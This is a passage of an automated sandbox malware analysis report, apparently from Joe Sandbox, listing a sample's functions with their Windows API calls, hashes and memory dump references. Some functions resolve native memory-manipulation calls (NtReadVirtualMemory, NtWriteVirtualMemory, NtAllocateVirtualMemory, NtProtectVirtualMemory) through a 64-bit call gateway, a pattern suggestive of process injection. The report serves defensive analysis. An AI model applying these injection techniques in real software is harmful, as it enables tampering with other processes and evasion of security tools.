                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Local$Free$lstrlen$Alloc$AttributesFileFolderKnownPathTask__snwprintf
                                                                            • String ID:
                                                                            • API String ID: 1368272246-0
                                                                            • Opcode ID: 050e032e2c37866efba06556f37a56ac5495f4966d7d2287fa61776a559187cb
                                                                            • Instruction ID: ae2b0d7b09482ab7e4f5dd407f8f25d065bf41c452ed1ca759d38e29979d5744
                                                                            • Opcode Fuzzy Hash: 050e032e2c37866efba06556f37a56ac5495f4966d7d2287fa61776a559187cb
                                                                            • Instruction Fuzzy Hash: FA21B679E00208EFDB04DF99D949AADBBB5FF8C300F108599E905A7361D774AA41DF60
                                                                            Function 007C95E0 Relevance: 7.5, APIs: 5, Instructions: 49COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 007C81C0: LocalAlloc.KERNEL32(00000040,0000FFFE,?,?,007C8D2B,007D6B10,00000000), ref: 007C81EB
                                                                              • Part of subcall function 007C81C0: LocalAlloc.KERNEL32(00000040,0000FFFE,?,?,007C8D2B), ref: 007C8205
                                                                              • Part of subcall function 007C81C0: wnsprintfW.SHLWAPI ref: 007C8235
                                                                              • Part of subcall function 007C81C0: wnsprintfW.SHLWAPI ref: 007C8251
                                                                              • Part of subcall function 007C81C0: LocalFree.KERNEL32(00000000), ref: 007C8A43
                                                                              • Part of subcall function 007C1C60: _wcsrchr.LIBCMT ref: 007C1C6C
                                                                            • GetFileAttributesW.KERNEL32(00000000), ref: 007C9630
                                                                            • LocalFree.KERNEL32(00000000), ref: 007C963F
                                                                            • LocalFree.KERNEL32(00000000), ref: 007C9649
                                                                            • LocalFree.KERNEL32(00000000), ref: 007C965A
                                                                            • LocalFree.KERNEL32(00000000), ref: 007C9664
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Local$Free$Allocwnsprintf$AttributesFile_wcsrchr
                                                                            • String ID:
                                                                            • API String ID: 3823319188-0
                                                                            • Opcode ID: b59e385f98b442c76e8f58e2d6e982526201997cc0c0c2963838d1fa62bc1ce3
                                                                            • Instruction ID: 7035bbec266a111c574b8e244e2206b9bbd4980377c496541a06691c8dc31ebf
                                                                            • Opcode Fuzzy Hash: b59e385f98b442c76e8f58e2d6e982526201997cc0c0c2963838d1fa62bc1ce3
                                                                            • Instruction Fuzzy Hash: B8111E7A900208FBCB44DBA4D94CE9E7B78AF88310F10459CF605E7280DA399A44CB51
                                                                            Function 007DC8E0 Relevance: 7.5, APIs: 5, Instructions: 48synchronizationCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SetEvent.KERNEL32(?), ref: 007DC915
                                                                            • WaitForSingleObject.KERNEL32(?,000000FF), ref: 007DC924
                                                                            • CloseHandle.KERNEL32(?), ref: 007DC931
                                                                            • CloseHandle.KERNEL32(?), ref: 007DC93E
                                                                            • LocalFree.KERNEL32(00000000), ref: 007DC958
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CloseHandle$EventFreeLocalObjectSingleWait
                                                                            • String ID:
                                                                            • API String ID: 3879024238-0
                                                                            • Opcode ID: 6d4e1bfca27d165f3dce1a099c062fbc797a44c112e62c13100913a81081996d
                                                                            • Instruction ID: 253623ed1f0aa518fc1bf362027ee9378236686e44e68bac29c4a3204fc407a5
                                                                            • Opcode Fuzzy Hash: 6d4e1bfca27d165f3dce1a099c062fbc797a44c112e62c13100913a81081996d
                                                                            • Instruction Fuzzy Hash: 1911BE79A04208EFCB04DF94D988DADBBB5FF48711F20C289E90967395DB38AE41DB54
                                                                            Function 007DA170 Relevance: 7.5, APIs: 5, Instructions: 48COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Event
                                                                            • String ID:
                                                                            • API String ID: 4201588131-0
                                                                            • Opcode ID: 4eaa083b4ecb2962536b86e232c8a3aa9cd048b8f7afa5db1ce3a86c6e14d62c
                                                                            • Instruction ID: cda02a55713524a9f4034e6d4a5abd37bc0473956a8a245a8bca44c1b8d48c4e
                                                                            • Opcode Fuzzy Hash: 4eaa083b4ecb2962536b86e232c8a3aa9cd048b8f7afa5db1ce3a86c6e14d62c
                                                                            • Instruction Fuzzy Hash: 0811A474A00209EFCB04DF64D99496ABBB6FB89315F2089A9E81197310D775AE50DF90
                                                                            Function 007D32B0 Relevance: 7.5, APIs: 5, Instructions: 48COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 007D3350: LocalAlloc.KERNEL32(00000040,0000FFFE), ref: 007D3364
                                                                              • Part of subcall function 007D3350: LocalAlloc.KERNEL32(00000040,0000FFFE), ref: 007D3385
                                                                              • Part of subcall function 007D3350: SHGetKnownFolderPath.SHELL32(007F7C30,00000000,00000000,00000000), ref: 007D33AC
                                                                              • Part of subcall function 007D3350: lstrlenW.KERNEL32(00000000), ref: 007D33BA
                                                                              • Part of subcall function 007D3350: __snwprintf.LIBCMT ref: 007D33E4
                                                                              • Part of subcall function 007D3350: __snwprintf.LIBCMT ref: 007D33FE
                                                                              • Part of subcall function 007D3350: LocalFree.KERNEL32(00000000), ref: 007D340A
                                                                              • Part of subcall function 007D3350: CoTaskMemFree.COMBASE(00000000), ref: 007D3414
                                                                            • GetFileAttributesW.KERNEL32(00000000), ref: 007D32CF
                                                                            • LocalFree.KERNEL32(00000000), ref: 007D32E2
                                                                            • GetFileAttributesW.KERNEL32(00000000), ref: 007D3312
                                                                            • LocalFree.KERNEL32(00000000), ref: 007D3325
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Local$Free$AllocAttributesFile__snwprintf$FolderKnownPathTasklstrlen
                                                                            • String ID:
                                                                            • API String ID: 1889006086-0
                                                                            • Opcode ID: 285e54e23c94dc6301ffe37210da0faca7314cb91fc6d1dbbfa2e2725c9f76e1
                                                                            • Instruction ID: a7fba4207ad408ad8959ab7abf3ebc9fb2f47996a7f7ab77301316cb15b68a51
                                                                            • Opcode Fuzzy Hash: 285e54e23c94dc6301ffe37210da0faca7314cb91fc6d1dbbfa2e2725c9f76e1
                                                                            • Instruction Fuzzy Hash: DC11BA75D00208EFDB10EBA4DA48AADBB74FF48301F5089A9E516A7390DB799B40DB51
                                                                            Function 007D9CC0 Relevance: 7.5, APIs: 5, Instructions: 48COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Event
                                                                            • String ID:
                                                                            • API String ID: 4201588131-0
                                                                            • Opcode ID: 4eaa083b4ecb2962536b86e232c8a3aa9cd048b8f7afa5db1ce3a86c6e14d62c
                                                                            • Instruction ID: 7b85af4dea01bedb8d55c9bae82e200064a8e5380eb9b9d440d96867c2c95bd1
                                                                            • Opcode Fuzzy Hash: 4eaa083b4ecb2962536b86e232c8a3aa9cd048b8f7afa5db1ce3a86c6e14d62c
                                                                            • Instruction Fuzzy Hash: 0611B374A00209DFCB04DF64D99899EBBB6FF89315F2089A9F815A7310C775AE50DF90
                                                                            Function 007C41F0 Relevance: 7.5, APIs: 5, Instructions: 47threadCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,007DBBFD), ref: 007C4217
                                                                            • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,007DBBFD), ref: 007C4233
                                                                            • CreateThread.KERNEL32(00000000,00000000,007C4320,00000000,00000000,00000000), ref: 007C4256
                                                                            • CloseHandle.KERNEL32(00000000,?,007DBBFD), ref: 007C4277
                                                                            • CloseHandle.KERNEL32(00000000,?,007DBBFD), ref: 007C428E
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Create$CloseEventHandle$Thread
                                                                            • String ID:
                                                                            • API String ID: 3315681087-0
                                                                            • Opcode ID: d500e72df7ca57e6087bbcaddcd240559c8c4633549131880699e4a2b7211c5f
                                                                            • Instruction ID: ac628902b6b5f975a2a495da1b970ba895b7aa6196b71d2c8bc97f918d6c8cdd
                                                                            • Opcode Fuzzy Hash: d500e72df7ca57e6087bbcaddcd240559c8c4633549131880699e4a2b7211c5f
                                                                            • Instruction Fuzzy Hash: 0411CCB0685300EFE7205B64ED1EF5A3BA8B784705F104A2DFB05AA2F0CBF96484CB04
                                                                            Function 007E92DC Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • __getptd.LIBCMT ref: 007E92E8
                                                                              • Part of subcall function 007E81BE: __getptd_noexit.LIBCMT ref: 007E81C1
                                                                              • Part of subcall function 007E81BE: __amsg_exit.LIBCMT ref: 007E81CE
                                                                            • __getptd.LIBCMT ref: 007E92FF
                                                                            • __amsg_exit.LIBCMT ref: 007E930D
                                                                            • __lock.LIBCMT ref: 007E931D
                                                                            • __updatetlocinfoEx_nolock.LIBCMT ref: 007E9331
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                                            • String ID:
                                                                            • API String ID: 938513278-0
                                                                            • Opcode ID: 97ade72944fd9a5527dad2c2d085e88e7c720f1f88ef51650a9be13cf65d8f55
                                                                            • Instruction ID: 847c2f1b547f90466415b3ba7ae71a1f70ba97f15281f4a8c010ac7cc7e31480
                                                                            • Opcode Fuzzy Hash: 97ade72944fd9a5527dad2c2d085e88e7c720f1f88ef51650a9be13cf65d8f55
                                                                            • Instruction Fuzzy Hash: C8F0F03390B788EADB65BB67980A70936A0BF08720F114109F644A72E2CB3C49018A97
                                                                            Function 007DC970 Relevance: 7.5, APIs: 5, Instructions: 26COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CoInitialize.OLE32(00000000), ref: 007DC978
                                                                            • CoCreateGuid.COMBASE(?), ref: 007DC982
                                                                            • StringFromGUID2.COMBASE(?,?,00000027), ref: 007DC996
                                                                            • CoUninitialize.COMBASE ref: 007DC9A0
                                                                            • CoUninitialize.COMBASE ref: 007DC9AD
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Uninitialize$CreateFromGuidInitializeString
                                                                            • String ID:
                                                                            • API String ID: 46189592-0
                                                                            • Opcode ID: 3116f1afdd81727ba1670a68d86bd2cac9361e46969d2478302691c2084271e8
                                                                            • Instruction ID: 8e23b9e79a8e409d33b8e844a780da496bc66689d4bf4498cc20a4d4c1a30080
                                                                            • Opcode Fuzzy Hash: 3116f1afdd81727ba1670a68d86bd2cac9361e46969d2478302691c2084271e8
                                                                            • Instruction Fuzzy Hash: 2DE0ED3160430A9BD700AFB4FD49B6EB7B9BB98701F004D19B955C6250E676E410CB52
                                                                            Function 007E1160 Relevance: 7.5, APIs: 5, Instructions: 25synchronizationCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007E1534
                                                                            • ReleaseMutex.KERNEL32(00000000), ref: 007E154E
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007E1558
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007E1568
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007E1572
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CloseHandle$MutexRelease
                                                                            • String ID:
                                                                            • API String ID: 2279609368-0
                                                                            • Opcode ID: e6a5b02f74926042dd60fa6d4b5d9e7e042f6a315fd48813fcb21d01c539ea7a
                                                                            • Instruction ID: cb34dca16582781fe61aef5e23c8b4b523b1b7d9284082c29783214f74fe2488
                                                                            • Opcode Fuzzy Hash: e6a5b02f74926042dd60fa6d4b5d9e7e042f6a315fd48813fcb21d01c539ea7a
                                                                            • Instruction Fuzzy Hash: 45F01C76905204EBC718CFA0E84DB6DB775FB8C301F50C548E516A2260CB3C8951CF58
                                                                            Function 007C64B0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 82COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetProcAddress64.FILE(00000000,?,NtReadVirtualMemory), ref: 007C64D4
                                                                            • X64Call.FILE(00000000,00000000,00000005,?,?,?,?,00000000,00000000,?,00000000,?,00000000), ref: 007C6554
                                                                            • SetLastErrorFromX64Call.FILE(00000000,?), ref: 007C6576
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Call$Address64ErrorFromLastProc
                                                                            • String ID: NtReadVirtualMemory
                                                                            • API String ID: 3570319994-2166501906
                                                                            • Opcode ID: 1acd3a0817e5521c04f35cd85d4620cb6b9561a10268146bf3af56bf0e6a41a5
                                                                            • Instruction ID: c2d45c2aca8e6708e8fe3e2d2d0a0b2ab3d8275747646f3ca773c225947af87b
                                                                            • Opcode Fuzzy Hash: 1acd3a0817e5521c04f35cd85d4620cb6b9561a10268146bf3af56bf0e6a41a5
                                                                            • Instruction Fuzzy Hash: 6D310CF1900209EFDB14DF54EC85FABB7B4BB88714F20842DE805A7254E77999A1CF61
                                                                            Function 007C65A0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 82COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetProcAddress64.FILE(00000000,?,NtWriteVirtualMemory), ref: 007C65C4
                                                                            • X64Call.FILE(00000000,00000000,00000005,?,?,?,?,00000000,00000000,?,00000000,?,00000000), ref: 007C6644
                                                                            • SetLastErrorFromX64Call.FILE(00000000,?), ref: 007C6666
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Call$Address64ErrorFromLastProc
                                                                            • String ID: NtWriteVirtualMemory
                                                                            • API String ID: 3570319994-3834091833
                                                                            • Opcode ID: bf25ce749d85ceac8b82b950dadd257682f17c22f610d3c5ae016e164bb097fa
                                                                            • Instruction ID: 05e18ef1f07d1dcb2a5da4730f6c5840b233b2c93690c55841980b9b7cab01df
                                                                            • Opcode Fuzzy Hash: bf25ce749d85ceac8b82b950dadd257682f17c22f610d3c5ae016e164bb097fa
                                                                            • Instruction Fuzzy Hash: 89313EB0900209EFDB14DF64D895FBBB7B4BB88315F10852DE805A7250E7399A91CF61
                                                                            Function 007C6230 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 79COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetProcAddress64.FILE(00000000,?,NtAllocateVirtualMemory), ref: 007C6254
                                                                            • X64Call.FILE(00000000,00000000,00000006,?,00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,00000000), ref: 007C62CE
                                                                            • SetLastErrorFromX64Call.FILE(00000000,?), ref: 007C62F0
                                                                            Strings
                                                                            • NtAllocateVirtualMemory, xrefs: 007C6248
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Call$Address64ErrorFromLastProc
                                                                            • String ID: NtAllocateVirtualMemory
                                                                            • API String ID: 3570319994-3765841899
                                                                            • Opcode ID: 76349990504a2998754788bf23f79193185d139e553e2e3a4b89e285e0a61849
                                                                            • Instruction ID: d0b0a5048470253c64db9fe5f2715ac50fb891d2e92ab46a97e258bd6980259c
                                                                            • Opcode Fuzzy Hash: 76349990504a2998754788bf23f79193185d139e553e2e3a4b89e285e0a61849
                                                                            • Instruction Fuzzy Hash: 91211DB1E00209EFDB14DFA4DD46F7BB7B9FB88710F40852DE404A7244E7785A448B90
                                                                            Function 007C63E0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 74COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetProcAddress64.FILE(00000000,?,NtProtectVirtualMemory), ref: 007C6404
